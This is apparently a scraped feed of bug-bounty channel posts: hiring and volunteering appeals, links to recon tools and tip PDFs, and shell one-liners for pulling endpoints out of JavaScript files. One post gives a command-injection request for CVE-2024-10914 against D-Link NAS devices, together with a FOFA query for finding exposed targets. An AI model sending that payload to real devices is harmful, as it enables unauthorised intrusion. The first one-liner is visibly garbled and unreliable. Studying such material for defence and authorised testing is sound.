🚀 Exciting News! 🚀

We're launching our Internship Program soon, and we'd love to hear from you!

What are your expectations for this opportunity? 🤔
Drop your thoughts below! ⬇️

@anukulhexx

🌟 Take a Break from Bug Bounty – Give Back with Divriti Foundation! 🌟

Hey, bug bounty hunters! I know we're all deeply involved in finding vulnerabilities, but sometimes it’s good to step back and make a positive impact in other ways. If you’ve got a little time to spare, come join me with Divriti Foundation and let’s give back to the community and the environment!

Divriti, based in Delhi, India, is leading initiatives in:

🌱 Environmental Conservation: Tree planting and sustainability efforts.
📚 Education: Supporting underprivileged students.
🐾 Animal Welfare: Caring for street animals.
and more..

And here’s a bonus: by volunteering, you’ll also have more chances to connect with me personally. I’d be happy to share bug bounty tips, guidance, and insights when we work together on initiatives. So if you’re interested in both community work and learning opportunities, this is the perfect chance!

WhatsApp Group Link to Join

💚 Let’s make time for nature and community. Together, we can make a real difference!

🐞 I’ve noticed a lot of beginners in bug bounty and pentesting feel pretty lost. Many are overwhelmed or unsure where to begin, so I put together some tips on common mistakes.

Read through these and see if you’re missing anything!
https://vulncure.com/PDF/Guide__Common_Mistakes_by_Bug_Hunters_.pdf

#bugbounty #infosec

Hey everyone! 🌟 Hope you’re all doing well in your current phase. I’m looking for a skilled React Native developer to join us and help mitigate some ongoing challenges. If you’re interested or know someone who might be a great fit, please reach out to me at @rootxabhishek. Thanks!

⚠️ S3 Bucket Recon ⚠️

Source : https://github.com/securitycipher/awsome-websecurity-checklist/blob/main/Mindmaps/S3-Bucket%20Recon.png

cve-2024-10914

GET

/cgi-bin/account_mgr.cgi?cmd=cgi_user_add&name=%27;<INJECTED_SHELL_COMMAND>;%27

FOFA：app =D_Link-DNS-ShareCenter

#exploit #poc #IoT

⚡️uro - Using a URL list for security testing can be painful as there are a lot of URLs that have uninteresting/duplicate content; uro aims to solve that.

🔗github.com/s0md3v/uro

🔍 gitlab-subdomains - A Go-based tool to uncover subdomains via GitLab searches.

🔗https://github.com/gwen001/gitlab-subdomains

Extract all endpoints from a JS File and take your bug 🐞

✅Method one

waybackurls HOSTS | tac | sed "s#\\\/#\/#g" | egrep -o "src['\"]?
15*[=: 1\5*[ '\"]?[^'\"]+.js[^'|"> ]*" | awk -F '/'
'{if(length($2))print "https://"$2}' | sort -fu | xargs -I '%' sh
-c "curl -k -s \"%)" | sed \"s/[;}\)>]/\n/g\" | grep -Po \" (L'1|\"](https?: )?[/1{1,2}[^'||l"> 1{5,3)|(\.
(get|post|ajax|load)\s*\(\5*['||\"](https?:)?[/1{1,2}[^'||\"> ]
{5,})\"" | awk -F "['|"]" '{print $2}' sort -fu

✅Method two

cat JS.txt | grep -aop "(?<=(\"|\'|' ))\/[a-zA-Z0-9?&=\/-#.](?= (\"||'|'))" | sort -u | tee JS.txt

#infosec #cybersec #bugbountytips

⚡️Want to download 100+ Bug Bounty Tips collected from X?

✅Download the PDF from here

#BugBounty #bugbountytips

🔖 Dnsbruter - A powerful tool for active subdomain enumeration and discovery.

✨ Features:
Dnsbruter uses DNS resolution to bruteforce and identify subdomains efficiently. Its multithreading capability allows users to control concurrency for faster and more effective results. Perfect for researchers and pen testers targeting domain reconnaissance.

🔗 https://github.com/RevoltSecurities/Dnsbruter/

🔖The ultimate 403 Bypass wordlists and tester notes by JHaddix

📱 Github: 🔗 Link

🚀 Exciting News for #InfoSec & #BugBounty! 🛡

ProxSec v1.0.0 is out—an open-source extension for security pros! 🔥

✅ Proxy management
✅ Scope validation
✅ Program tracking
✅ Lightweight & private

Open-Source : https://github.com/aacle/ProxSec

Feedback welcome! 💬